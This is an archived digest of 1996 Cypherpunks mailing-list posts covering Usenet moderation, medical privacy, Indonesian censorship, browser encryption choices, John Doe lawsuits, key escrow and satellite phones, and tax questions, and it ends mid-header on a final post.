> >Permit me to go off in an orthogonal direction here and say that
> >I think that we should do away with the concept of a pre-ordained
> >newsgroups in Usenet entirely, in favor of an IRC-like dynamic 
> >creation of message pools.
> 
> Moderated newsgroups gain reputation from their moderation policies and
> probably should not be included in this scheme.

Moderated newsgroups have very few posts because hardly anyone reads 
them.  I second the above propsed IRC-like scheme if it only would apply 
to moderated groups, because of IRC's bad reputation of moderation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 20 Aug 1996 16:33:31 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: "Utilization Review"
Message-ID: <199608200618.XAA18824@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:58 PM 8/19/96 -0700, Rich Graves wrote:
>On Mon, 19 Aug 1996, Bill Frantz wrote:
>> Perhaps, within our current social order, medical savings plans
>> are the best option on the table.
>
>What alternative social orders can you envision that would handle this
>problem elegantly? I can't think of any off the top of my head.

Well, under Cryptoanarchy the whole problem disappears.  Your medical
records are handled as per your contract with your doctor.  There are no
3rd party payers who have a stake.  With no taxes, the deduction for
medical savings plans disappears and with it the principle reason for them.
 (People would still need to save for medical costs.)
 

>Medical savings plans do not work for anyone but the extremely rich and
>healthy, because few normal people can self-insure to cover the risk.

The risk of catastrophic illness is indeed significant, but statistically
rare.  If we assume people will insure for it, and insurance companies
still have access to the records of the care they pay for, then we are
still better off than we are today with all care being paid by insurance
companies.  In this scenario, routine medical care is being paid by the
patient, and the records can be private between the patient and the doctor.
 This kind of system would prevent the general availability of information
such as whether a patient had a vasectomy.

Note that in the general case, people are healthy in their youth, and can
build up savings for when health problems develop with age.  TANSTAAFL.  On
the average, everyone has to pay the cost of their medical care.


>There's also the little matter of letting your doctor know your medical
>history.

I have no problem letting my doctor know my medical history protected by
doctor-patient confidentiality.  It's the insurance company/human resources
department/government access I worry about.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nathan poznick <npoznick@Harding.edu>
Date: Tue, 20 Aug 1996 15:18:04 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <Pine.GUL.3.95.960819171725.2971E-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SOL.3.94.960820001143.11266A-100000@taz>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, Rich Graves wrote:

> There seems to be some confusion about the facts of the case, i.e., whether
> the pictures really came from a case that was solved. I assume that that
> will all be cleared up, but I'm not laughing anymore. 
> 
> I can imagine some kid gleefully accepting such pics to put up on a
> grotesque page as an anti-censorship demonstration -- and then finding out
> that he had the only evidence to an unsolved crime. 

i've visited Dan's Gallery of the Grotesk several times over the last few
months, and i can tell you, that Dan takes these pictures and the history
behin them quite seriously...
if you read all the pages, and all his thoughts, you can tell that he's
not just some kid that snatched up some gross pictures for the heck of
it...

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^		             Nathan Poznick				 ^
^	        	 <npoznick@harding.edu>				 ^
^                    http://www.harding.edu/~npoznick			 ^
^									 ^
^                  "640k should be enough for anybody."			 ^
^									 ^
^		          --Bill Gates, 1981--				 ^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Tue, 20 Aug 1996 17:27:29 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Indonesia detains democracy activist after post to mailing list (fwd)
Message-ID: <v02140b00ae3f22e546fe@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Declan wrote:
[...]
> Back to Indonesia -- my column should have said the Indonesian military is
> *trying* to ban the mailing list from the country. They haven't succeeded
> yet. Time will tell.
>
> I have more information on Indonesia at http://www2.eff.org/~declan/global/
>--
> right now, use the www2 address since not all directories seem to be
> updating on the mirror servers properly right now.

For those who are curious, Indonesia is an interesting test case among the
Pacific Rim counties because the current iron-fisted ruler is beginning to
get a bit long in the tooth and no one has any idea what it going to happen
when he finally croaks.  Indonesia has had almost no political opposition
since a rather violent anti-Communist crackdown/coup in the 60s.  All media
access was rigorously controlled and the possibilities the Internet and
similar computer networking technologies offer (ObCryptoAnarchy ref...) are
just now becoming apparent to those who are in charge.  How this plays out
will have interesting reprecussions in other such countries where politicial
discourse is a new phenomenon and where the Internet is just now being seen
as a threat to the current order.

jim, former exchange student to Indonesia who hopes the transition is less
bloddy than Indonesia's last change of government...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Tue, 20 Aug 1996 18:39:57 +0800
To: cypherpunks@toad.com
Subject: Netscape 3.0 and encryption choices
Message-ID: <2.2.32.19960820080407.0035a35c@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In Netscape 3.0, the program allows the user to specify which encryption
standards to allow connections with.  It allows encryption with 128-bit RC4,
128-bit RC2, and 156-bit(I think)3DES.  Of these three, which would be the
most secure method?  It is possible to restrict all secure connects to be of
3DES only for example.  What would be the most secure way to go, DES or RC4?
this is the newly released US-Only downloadable copy of Netscape 3.0
--
______________________________________________________________________________
Ted Cabeen         http://shadowland.rh.uchicago.edu         cabeen@netcom.com
Check Website or finger for PGP Public Key        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province." -F. Bacon   cococabeen@aol.com
"Human kind cannot bear very much reality."-T.S.Eliot 73126.626@compuserve.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 20 Aug 1996 19:19:08 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <199608200513.PAA23414@suburbia.net>
Message-ID: <Pine.GUL.3.95.960820012724.5850C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I've heard that story so many times from so many less-than-worthless sources
(primarily the wacky-left "Christic Institute" and KPFK Radio) that I find
it difficult to take it seriously. But I do. The US, Cuban, and
"entrepreneurial" actors in Central America in the 80's were so fucked up
that just about anything is possible. 

Although... I thought it was pretty funny that today's story matter-of-
factly identified Calero as a CIA agent. Yeah, and registering Republican
makes me Barbara Bush. 

At least he's not quiting Agee.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 20 Aug 1996 19:21:17 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Death of Usenet: Film at 11
In-Reply-To: <199608200631.AA05778@world.std.com>
Message-ID: <Pine.GUL.3.95.960820013922.5850D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Tom Breton wrote:

> * If rejected messages were indicated by simply missing a signature of
> approval, voluntary not searched for by individual readers, it would be
> harder to claim moderator censorship. Or to accomplish it, for that
> matter.
> 
> * Multiple independent moderators could work on the same newsgroup.
> 
> * If the stamp of approval were dissociated from the message proper,
> messages could propagate without waiting for the moderator's
> receive-email-and-post cycle. The moderator's "OK" would catch up later,
> for those readers that wait for it.

Innaresting. Sort of a reverse NoCeM. I like it, but of course you'd have to
distribute the clients by magic.

Sounds good for discussion groups, especially soc.culture.* and
soc.religion.*, but there's still a role for strictly moderated *.announce
groups. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tob@world.std.com (Tom Breton)
Date: Tue, 20 Aug 1996 16:35:48 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Death of Usenet: Film at 11
Message-ID: <199608200631.AA05778@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:
> At  1:34 PM 8/19/96 -0700, Mike Duvos wrote:
> >
> Moderated newsgroups gain reputation from their moderation policies and
> probably should not be included in this scheme.

Actually, this was hashed out a long time ago on the late, lamented
news.future. I'm pleased to see ideas I fought for coming to life again.

Moderation could easily fit in. A moderation-stamp would be just one
more field for the search to work with. Someone (I think it was me but
it's been years since all this was said!) speculated that this would
actually be an improvement in several ways:

* If rejected messages were indicated by simply missing a signature of
approval, voluntary not searched for by individual readers, it would be
harder to claim moderator censorship. Or to accomplish it, for that
matter.

* Multiple independent moderators could work on the same newsgroup.

* If the stamp of approval were dissociated from the message proper,
messages could propagate without waiting for the moderator's
receive-email-and-post cycle. The moderator's "OK" would catch up later,
for those readers that wait for it.


Imminent resurrection of Usenet predicted. Film-teaser at 5.

        Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 05:45:14 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes on Internet access prediction
Message-ID: <ae3f3913000210049dc3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:07 AM 8/20/96, Mike McNally wrote:
>States and municipalities are taxing internet access.  Who wants to
>make a prediction about if/when the IRS will start to count net access
>as a taxable fringe benefit of employment?
>
>(At a small company where I once worked, a tax accountant visiting
>one day noticed that we had a weight bench set up in a back corner of
>the big "back room".  He advised us to be careful, because the IRS
>could count that as a taxable employee benefit.)

I think the test of whether something is a "perq" (or is it "perk"?), and
thus possibly taxable to the employee, is whether it is outside the normal
bounds of work. Thus, one's office cubicle, computer, office supplies,
etc., are not taxable fringe benefits.

Membership in a country club is, though.

Net access, if primarily used for work-related things, would not be. Just
as company phone calls are not treated as a fringe benefit for the
employees making the phone calls. Or business trips. And so on.

At least one community has tried to treat _parking places_ (and I don't
mean special, tree-shaded, reserved, V.I.P. parking places) as taxable
benefits. This is to try to get more people to car-pool, or telecommute, or
somesuch. Howls of protest pretty much drove this idea back into the hole
from whence it came.

Many of my Intel friends have Net accounts, obviously, and yet the number
of posts on the Usenet or elsewhere from "*.intel.com" are relatively low.
I asked a couple of friends of mine about this, and they confirmed that
Intel management has discouraged public postings and comments from
*.intel.com domain accounts. Understandable, for reasons I have discussed
many times. Many employees of companies find it easier to purchase their
own account from Netcom, Earthlink, Best, etc., and so have a Net name
unaffiliated with their employer.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 20 Aug 1996 22:07:34 +0800
To: cypherpunks@toad.com
Subject: Re: CS First Boston lawsuit
Message-ID: <2.2.32.19960820101053.0069d994@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 PM 8/19/96 -0400, Black Unicorn wrote:
>On Sun, 18 Aug 1996, Timothy C. May wrote:
>
>> At 3:29 AM 8/19/96, Alan Horowitz wrote:
>> >I suspect they are trying to get a judgement against "John Doe", in the
>> >hopes of tracking him down later.
>> >
>> >Actually, if I had a sizeable judgement against such a John Doe, I could
>> >probably find a private detective who would find the dude for a
>> >contingent fee. Wow, a whole new class of factoring (commerce definition)
>> >opens up. Get me a lawyer....

Sure, there are collection people who do this regularly; it's also possible
to sell judgements for a fraction of their face value. 

>> Lawyers out there can and should correct me if I'm wrong, but I don't
>> believe either the criminal or civil justice system has the concept of a
>> "John Doe" trial! The ability to have the advice of an attorney, to
>> confront one's accusers, cross-examine witnesses, and mount a defense, and
>> all that constitutional stuff. Rather hard to do if the trial is in the
>> past tense.
>> 
>> Can you cite an example of such a "John Doe" trial in the U.S.?
>
>Not exactly, but judgements against John Doe's or even "$956,334.34" are
>common.  Typically they are default judgements where a property seizure is
>involved.
>
>"The United States of America v. $534,444.00" and "The United States of
>AMerica v. One Red Porsche" is a common theme.

It is possible to name unknown defendants in a suit - the tradition is to
name them as, literally, "John Doe" or "John Does 1-6, unknown Washington
County Sheriff's Deputies". The idea is that at some point prior to trial
you'll learn the names of the defendants and then ask the court for
permission to amend your complaint to add the newly found names. 

(e.g., Oregon Rule of Civil Procedure 20(H): "Fictitious Parties. When a
party is ignorant of the name of an opposing party and so alleges in a
pleading, the opposing party may be designated by any name, and when such
party's true name is discovered, the process and all pleadings and
proceedings in the action may be amended by substituting the true name.")

But naming someone in a suit is not sufficient to give them notice that
they've been sued, so that they know to file an answer and otherwise defend
themselves. At least in Oregon (state & Fed courts, since Fed courts borrow
the state's rules for service of process, Fed Rul Civ Pro 4(e)(1)), service
by publication (as mentioned in another message) is only allowed where the
plaintiff files an affidavit that they have tried every other appropriate
means of service and they have been unsuccessful, or that they have reason
to know it will be unsuccessful. ORCP 7(D)(7). Service by publication is
relatively rare. 

So Tim's correct (at least as far as I know, and I sure don't know
everything) when he says that John Doe *trials* are essentially unknown -
because if defendant(s) don't appear for trial but have been served, the
plaintiff can get a default judgement against them - which makes a trial
unnecessary, at least for those defendants. 

It's also possible (sometimes) for a defendant to overturn a default
judgement and ask for a real trial, if they can show that there was a good
reason why they didn't respond initially. Bad (or unattempted) service of
process is usually a good reason. 

The John Doe lawsuits are more likely to falter at the service-of-process
stage; before you get to ask for a default judgment, you've got to prove
that the defendant was served. And if you don't even know their name, it's
tough to serve them with the summons & complaint. No service, no judgement. 

The connection between the service-of-process problem and the in rem cases
Black Unicorn mentioned (e.g., "United States v. $405,089.23") is that the
owner of the property is supposedly put on notice by the seizure or
attachment of the property itself. A court can exercise jurisdiction over
*stuff* (e.g., property) and enter a judgement against the stuff even if it
hasn't gained jurisdiction (via service of process) over the person who owns
the stuff. In the most common seizures, the stuff is seized from one or more
people; those people are also given notice of the seizure and their right to
contest it.

(which is not to say that I'm a fan of forfeiture - I'm not - but the cases
I've seen/worked on haven't suggested that lack of notice is a problem.
Claimants/owners/possessors don't always understand the notice they're given
at seizure, and they don't always bother to act within the awfully short
deadlines (10-15 days, in some cases) required to file a claim. But people
do get (arguably inadequate) notice.) 

To some extent, in rem jurisdiction is practically necessary - otherwise
it'd be possible to have property in a wrong place, or creating
unwanted/harmful effects, which could not be legally moved or changed
without service of process on the owner - who may be dead or travelling or
uninterested or just hard to find. If cryptoanarchy becomes more prevalent,
and it becomes more difficult to trace ownership and control of interesting
stuff (e.g., physical or intellectual property, and/or "bots" of one flavor
or another), look for more in rem actions, not fewer.   

(I can't think of an example of a John Doe criminal proceeding, except that
I believe grand juries can hear testimony and investigate crimes where a
target has not yet been identified. But that's a very early stage of
criminal proceedings where the defendant doesn't have many rights even if
they are identified; so the lack of notice isn't much of an injury.) 

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 20 Aug 1996 17:49:15 +0800
To: zachb@netcom.com
Subject: Re: your mail
Message-ID: <199608200720.DAA20113@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


I feel like a fool now.  I think I'll go slam some Jello laced with Dew and
quack like a dolphin now.

Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 20 Aug 1996 17:34:01 +0800
To: zachb@netcom.com
Subject: Re: No Subject - Lesson in cracking (cryptoanalysis 001)
Message-ID: <199608200722.DAA20149@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Wait wait wait!  I have a bridge I want to sell him first.  Course, I 
shouldn't talk.  I bought the planet yesterday.  You all owe me $5k/hour rent.

Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 06:15:37 +0800
To: cypherpunks@toad.com
Subject: Re: Billy boy's satellites [Was - Floating DataHaven]
Message-ID: <ae3f4b0601021004d5a1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:26 PM 8/20/96, Brian Davis wrote:
>On Mon, 19 Aug 1996, Timothy C. May wrote:

>> There's some obvious crypto/GAK/New World Order issues: many countries may
>> not care for a communications system which allows citizen-units or enemy
>> agents to make phone calls from the middle of the Kalahari desert or from
>> within the jungles of Burma.
>>
>
>Or the streets of New York or Washington.  Not too long ago, in my former
>life as a federal prosecutor, I attended a Computer Crimes conference at
>Quantico (the FBI part, not the Marine part).  One of the speakers
>discussed LEO satellites and satellite cellular phones.  The "difficulty"
>in wiretapping those phones was of grave concern to most of those present....

I am sure this is a very real concern and a very real motivation for some
of the work being done on international key escrow (GAK--Global Access to
Keys?).

The various governments may be trying to get the several LEO satellite
projects to incorporate GAK circuitry now, before it's too late. Once the
satellites are up, and the handheld units sold in Fry's and CompUSA, it's
too late.

I'd hate to see the U.S. on the same side of the issue of free and open
communications (which means encrypted, if people so choose) as Burma,
Libya, Singapore, and France.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 21 Aug 1996 06:18:20 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Phoneco vs X-Phone
In-Reply-To: <199608181544.IAA18394@mail.pacifier.com>
Message-ID: <199608200402.EAA00380@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
> Well, let's consider such costs.  Most of which (maintenance, management, 
> rolling stock) are unrelated to amount of telephone usage.  So there is no 
> reason that these costs should be unequally attributed to a person who makes 
> local calls 1 hour per day, as opposed to another who only calls 15 minutes 
> per day, for example.
> 
> As for the "laying new pipes" issue:  Years ago in the the US, when 
> inter-central-office trunk connections were all implemented using large 
> bundles of copper pairs, it would have been _correct_ to say that higher 
> telephone usage resulted in larger costs, since more trunk lines were 
> necessary.  Today, on the other hand, inter-office trunks (at least the new 
> ones, and I presume that even many of the old ones have been switched over) 
> are implemented in fiber optics.  Extra capacity is either automatically 
> available (since the capacity of a given fiber is unlikely to be fully used) 
> or can be fairly simply added by converting old fiber from about 450 
> megabits per second to 2.4 gigabits, or even faster rates which have become 
> more recently available.
> 
 
Your view point doesn't really fit the facts, but since it is not the
issue here, I'll let it go. Can't resist like someone has to pay those 80,000+ 
employees at AT+T.

> >But you miss my point, if a phoneco is not getting a penny for its long 
> distanceservices (which subsidise the flat rate local calls) then the choice 
> would
> >be to close down. Which would be a severe attack to the local internet usage.
> 
> That's an entirely unsupported claim.  Nobody claims that telephone usage 
> (term used generically) is on the way out.  "Closing down" is only going to 
> happen if local phonecos cease to be able to provide a service that people 
> are willing to pay for.

Exactly! Once "X-Phone" has its servers in US Cities, and its charging 10 cents 
a minute for long distance calls, I don't see if the phonecos would be able to provide any service that people are willing to pay for, I mean they won't
be able to provide matching lucrative rates. 

You mean to say that, X-Phone will take advantage of the phoneco and mint 
money for a minimal investment, whereas the phoneco who spent billions on the
infrastructure will be just whistle down the road, and let the X-Phone 
indulge in its own cyberdo.
 
Its like you write a book and the cover designer sells it in his name.

Best,

- Vipul

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 06:22:34 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes on Internet access prediction
Message-ID: <ae3f4d89020210046ca3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:54 PM 8/20/96, Mike McNally wrote:

>Sure, but clearly that's not exclusively the case.  (Amazingly enough
>to some might be the fact that my for-work e-mail volume far exceeds
>my not-for-work volume.)  Hopefully I haven't brought too much shame
>to my employer.
>
>In any case, with the IRS it's often less a matter of common sense
>than what they happen to decide is The Law.  Witness the changes in
>laws about what constitutes a "home office".  Currently, if you're
>(let's say) a freelance plumber who maintains a legitimate office
...

Caveat: I'm not a defender of income taxes, of course. Nor am I a defender
of the IRS.

However, on the "home office" situation, most of the examples I encounter,
in talking to friends, are clearly scams to save a thousand bucks (or less)
on their tax returns. Most of my friends who try to deduct a room in their
house because they've put their computer there are clearly not using "20%"
or "25%" or whatever of their house as a business.

For those who really do actually use a room in their home for building
things, for meeting with clients, for operating a home business of some
sort, then I think the IRS will have no problems allowing it. (If the
subject even comes up, in an audit. There are some reports that attempting
to declare a home office increases ones chances of being audited....)

As the saying goes, consult a competent expert. A few books detail the
expected amount of work that must be done in a "home office," and whether
one is likely to qualify.

As one data point, I have derived nearly all of my income over the past 10
years from investments. And yet the "work" needed to be done on my computer
is such a tiny fraction of my overall use of it that I don't even try to
write off my various computers as "investment expenses." Your mileage may
vary.

And I certainly have not tried to write off a room in my house as a home
office. (As it happens, I need few of the "office" resources, so I have my
PowerMac and 17" monitor sitting beside my recliner in the family room of
my house, where I can lie back, log in, and bliss out in cyberspace.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 20 Aug 1996 22:38:31 +0800
To: cypherpunks@toad.com
Subject: AZ DMV: Citizenship to Drive? (fwd)
Message-ID: <Pine.SOL.3.91.960820073652.6866M-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Your papers, please?

---------- Forwarded message ----------
Date: Mon, 19 Aug 1996 21:04:07 -0700 (PDT)
From: Bob Witanek <bwitanek@igc.apc.org>
To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
Subject: AZ DMV: Citizenship to Drive?

Posted: gdiazj@IMAP1.ASU.EDU

Today the Arizona Department of Motor Vehicles began requiring
proof of citizenship before issuing a drivers license or a state
identification. This policy was established by HB 2154 which passed
this last session (this one slipped passed me).

I am helping organize people in Arizona to oppose this.  Please
send your information ASAP, we need you your help.

VIVA LA RAZA
George Diaz, Jr.
gdiazj@imap1.asu.edu
GDIAZJ@aol.com
gdiaz@ci.phoenix.az.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 20 Aug 1996 22:46:47 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820012724.5850C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SOL.3.91.960820073933.6866N-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Roger Morris has documented the base story nicely, first in an article 
intended for the Washington Post (but which wound up in Penthouse when the 
Post got cold feet) and now in a book, _Partners in Power_.

bd

On Tue, 20 Aug 1996, Rich Graves wrote:

> I've heard that story so many times from so many less-than-worthless sources
> (primarily the wacky-left "Christic Institute" and KPFK Radio) that I find
> it difficult to take it seriously. But I do. The US, Cuban, and
> "entrepreneurial" actors in Central America in the 80's were so fucked up
> that just about anything is possible. 
> 
> Although... I thought it was pretty funny that today's story matter-of-
> factly identified Calero as a CIA agent. Yeah, and registering Republican
> makes me Barbara Bush. 
> 
> At least he's not quiting Agee.
> 
> -rich
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Wed, 21 Aug 1996 02:22:57 +0800
To: cypherpunks@toad.com
Subject: 128-bit IE3.0 adventures
Message-ID: <199608201443.HAA12195@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, webmaster@microsoft.com
Date: Tue Aug 20 09:42:56 1996
I *finally* managed to get through to the 1-800 number that pops up when an 
attempted download of 128-bit MSIE 3.0 fails. They can only send out 
128-bit version *2.0*, it seems. They referred me to the 1-800 Sales 
number, but of course, the sales droids weren't savvy enough to understand 
the problem, and tried to hand me off to a 206 area code number. At that 
point, I called off the drill - I'm not going to pay for a toll call to fix 
MS's screwup.

"original" 800 number: 1-800-455-2959
Alternate 800 number: 1-800-426-9400 (autobot) - select 3, then 4, then 1 
to get a Real Person.

Anyone else upset about being denied might want to give them a call, too. 
Who knows, maybe if they get enough calls, they'll send someone to fix it.

Dave

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhkYK8VrTvyYOzAZAQE0SgQApRBedkueeR2JTAJknfA7JGER/oNReVUK
i8ImmNzjQDeionIkMbV2CuGOE/DwblVQ2yDgnUIBteNAFeiebwzdxaw9ysRKshRY
5AuvmXCyVsFJMNICFlZwNTRH+x4h7EPqA5BPxXJb+3b0sxWxqFcnU8QocJlFq+ap
ksb0mwgbVYc=
=L3IC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Tue, 20 Aug 1996 15:02:50 +0800
To: cypherpunks@toad.com
Subject: Anonymous password assignment failure (no password)
Message-ID: <9608200446.AA25374@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested the assignment of a new password
However, your message text didn't contain any password.
Remember that passwords should only contain letters and numbers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 21 Aug 1996 02:37:00 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Death of Usenet: Film at 11
In-Reply-To: <Pine.GUL.3.95.960820013922.5850D-100000@Networking.Stanford.EDU>
Message-ID: <9wJysD56w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <rich@c2.org> writes:
> > * If rejected messages were indicated by simply missing a signature of
> > approval, voluntary not searched for by individual readers, it would be
> > harder to claim moderator censorship. Or to accomplish it, for that
> > matter.
> >
> > * Multiple independent moderators could work on the same newsgroup.
> >
> > * If the stamp of approval were dissociated from the message proper,
> > messages could propagate without waiting for the moderator's
> > receive-email-and-post cycle. The moderator's "OK" would catch up later,
> > for those readers that wait for it.
>
> Innaresting. Sort of a reverse NoCeM. I like it, but of course you'd have to
> distribute the clients by magic.

Why 'reverse'? NoCeM's can be used to both 'hide' and 'highlight' articles.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 21 Aug 1996 02:31:21 +0800
To: Rich Graves <gimonca@skypoint.com>
Subject: Re: Indonesia detains democracy activist after post to mailing list (fwd)
Message-ID: <199608201454.HAA04784@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:18 PM 8/19/96 -0700, Rich Graves wrote:
> You know, Amnesty
> has some outstanding policies regarding accuracy, objectivity, and
> universality.

Such as their policy that disappearances in Cuba are only mentioned in 
a vague and euphemistic way somewhere in the fine print of the middle
of their Cuban reports, whereas similar disappearances are shouted from
the rooftops when they happen in right wing South American dictatorships?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean McGrath <sean@rosewood.his.ucsf.EDU>
Date: Wed, 21 Aug 1996 03:19:14 +0800
To: cypherpunks@toad.com
Subject: Re: Indonesia detains democracy activist after post to mailing list (fwd)
Message-ID: <Pine.A32.3.91.960820075229.31719B-100000@rosewood.his.ucsf.edu>
MIME-Version: 1.0
Content-Type: text/plain



> ...llike the Berkeley administration's reading student email ...
 
This was a paranoid fantasy that became a rumor and is on its was to an 
urban ledgend.  The UC administration does not have the inclination, 
interest or resources to monitor email.

Sean McGrath






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 21 Aug 1996 04:29:01 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: BlackNet: Commercial Posts?
